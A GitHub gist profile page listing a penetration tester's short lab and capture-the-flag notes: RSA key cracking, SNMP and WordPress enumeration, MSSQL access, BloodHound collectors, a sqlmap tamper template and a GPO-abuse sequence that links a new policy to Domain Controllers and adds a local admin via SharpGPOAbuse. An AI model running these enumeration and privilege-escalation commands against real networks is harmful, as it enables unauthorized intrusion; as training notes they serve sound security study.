Skip to content

Instantly share code, notes, and snippets.

View shollingsworth's full-sized avatar

Steven Hollingsworth shollingsworth

View GitHub Profile
@shollingsworth
shollingsworth / rsactftool_docker_run.sh
Created February 10, 2022 01:50
rsactftool docker run
# see ~/repos/RsaCtfTool
# docker build -t rsactftool .
docker run -it -v "$(pwd):/data" rsactftool:latest --publickey ./public.crt --private
@shollingsworth
shollingsworth / snmpwalk_all.sh
Created February 10, 2022 01:50
perform snmp enumeration snmpwalk all
snmpwalk -v2c -c public ${RHOSTS} -m ALL |& tee snmp_all.txt
@shollingsworth
shollingsworth / wordpress_user_page_enum.sh
Created February 10, 2022 01:51
wordpress user/page enum
# authors
wfuzz -z range,1-200 -u http://${R}/?author=FUZZ --hh 9104
# pages
wfuzz -z range,1-200 -u http://${R}/?p=FUZZ --hh 9104
@shollingsworth
shollingsworth / windows_recon_find_string_in_files.txt
Created February 10, 2022 01:51
windows recon find string in files
findstr /S /I /M /C:"karl" *.*
@shollingsworth
shollingsworth / mssql_sqsh.sh
Created February 10, 2022 01:52
mssql sqsh
#!/usr/bin/env bash
set -euo pipefail
IFS=$'\n\t'
remote="localhost:8999"
remote="web.teignton.htb:1433"
fn="$(mktemp)"
rc="$(mktemp)"
trap "rm -fv \${fn} \${rc}" EXIT
cat <<'EOF' > ${rc}
@shollingsworth
shollingsworth / bloodhound.sh
Created February 10, 2022 01:52
bloodhound cheat command sequence
# Serve bloodhound
/home/stev0/src/BloodHound-linux-x64/resources/app/Collectors/SharpHound.exe
/home/stev0/src/BloodHound-linux-x64/resources/app/Collectors/DebugBuilds/SharpHound.exe
/home/stev0/src/BloodHound-linux-x64/resources/app/Collectors/AzureHound.ps1
/home/stev0/src/BloodHound-linux-x64/resources/app/Collectors/SharpHound.ps1
/home/stev0/src/BloodHound-linux-x64/BloodHound
# Start Neo4j
~/bin/neo4j.sh
@shollingsworth
shollingsworth / powershell_unzip.txt
Created February 10, 2022 01:53
powershell unzip
# unznip
Expand-Archive dnSpy-net-win64.zip
@shollingsworth
shollingsworth / sqlmap_tamper_script.py
Created February 10, 2022 01:54
sqlmap tamper script template
#!/usr/bin/env python3
"""
Copyright (c) 2006-2021 sqlmap developers (http://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
# import os
# import re
# from lib.core.convert import encodeBase64
from lib.core.enums import PRIORITY
@shollingsworth
shollingsworth / mssql_python.py
Created February 10, 2022 01:55
mssql python / assembly injection
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""Do mssql stuff."""
from base64 import b64decode
import bs4
import pymssql
HOST = "web.teignton.htb"
PORT = 1433
New-GPO -Name wtfgpo -Comment "This is a test GPO"
New-GPLink -Name stev0 -Target "OU=Domain Controllers,DC=TEIGNTON,DC=HTB" -LinkEnabled Yes
.\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount jay.teignton --gponame stev0
gpupdate /force